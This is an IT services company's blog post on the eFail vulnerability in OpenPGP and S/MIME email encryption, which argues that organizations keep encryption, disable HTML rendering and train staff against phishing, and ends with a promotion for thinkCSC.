Email or eFail? Is Email Encryption Safe?

Email encryption is currently a controversial topic in the cybersecurity world. If you read Wired or the Washington Post, you might believe the sky is falling and that you should stop using email encryption right now. If you don’t, advanced hackers might take advantage of weaknesses that exist within widely used encryption programs to steal your data. It can be difficult to determine whether encrypted email is safe to use.

What Is Email Encryption?

Email encryption is designed not so much to prevent the interception of messages, but to render a message useless to someone who has received it without the proper credentials. Unfortunately, researchers have discovered that hackers can now intercept an email, manipulate how a message is processed, and read the plain text once the message is downloaded from a server. This attack, called eFail, can leave emails vulnerable.

Email encryption has flaws, but it’s not your biggest security threat.

IT experts have been warning for years that there are inherent weaknesses in any OpenPGP and S/MIME ecosystem. But a bigger risk than eFail are employees who lack basic cybersecurity skills and still click on unknown links or open unsafe attachments. Yes, eFail is something to be aware of. But, as with any news these days, one must read past the headlines and hype to determine the actual facts – and in this case, most organizations would be better off leaving their encryption alone and training their employees to avoid phishing attacks and ransomware.

What is the best course of action?

eFail is certainly something to be aware of, and there are some improperly installed PGP implementations that need to be addressed. Rather than eliminate email encryption, most organizations can nip the threat by disabling HTML rendering in your email client, as recommended by Hackaday. Hackaday has one of the easiest-to-comprehend breakdowns of eFail and why it’s not really the “PGPocalipse” the media would have had us believe it was.

Blanket elimination of email encryption tools will leave organizations open to other attacks, and in this case, it is overkill. Instead, work with your managed IT team to make sure your PGP installation was done properly, and have them conduct a risk assessment. But if you really want to ensure email security, focus on training employees. They are your front-line defense against the most malicious attacks to steal your data.

At thinkCSC, we believe that in order to achieve maximum success, regardless of the size or type of your organization, you must make IT an integral part of your overall business strategy and partner with IT professionals who not only understand how to leverage technology to their advantage but who are also committed to understanding your business goals and aligning your IT strategy to theirs. We pride ourselves on having the best business-savvy technical experts in the industry. If you would like to learn how to create an IT security strategy aligned with your organizational goalscontact thinkCSC for more information.